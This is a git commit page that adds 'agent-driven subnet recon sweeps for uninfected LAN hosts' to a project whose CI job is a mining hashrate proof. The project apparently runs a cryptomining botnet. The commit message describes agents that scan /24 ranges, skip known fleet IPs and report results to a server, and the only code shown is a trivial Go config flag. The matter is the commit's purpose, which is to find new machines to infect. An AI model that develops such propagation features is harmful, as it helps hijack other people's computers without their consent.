Add agent-driven subnet recon sweeps for uninfected LAN hosts.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Agents scan capped /24 targets on auth and on a server policy interval, skip known fleet IPs, and batch subnet_recon_report over WebSocket.
This commit is contained in:
6
agent/config/subnet_recon.go
Normal file
6
agent/config/subnet_recon.go
Normal file
@@ -0,0 +1,6 @@
|
||||
package config
|
||||
|
||||
// SubnetReconEnabled reports whether server policy enables agent-driven subnet recon.
|
||||
func SubnetReconEnabled(cfg RuntimeConfig) bool {
|
||||
return cfg.SubnetReconEnabled
|
||||
}
|
||||
Reference in New Issue
Block a user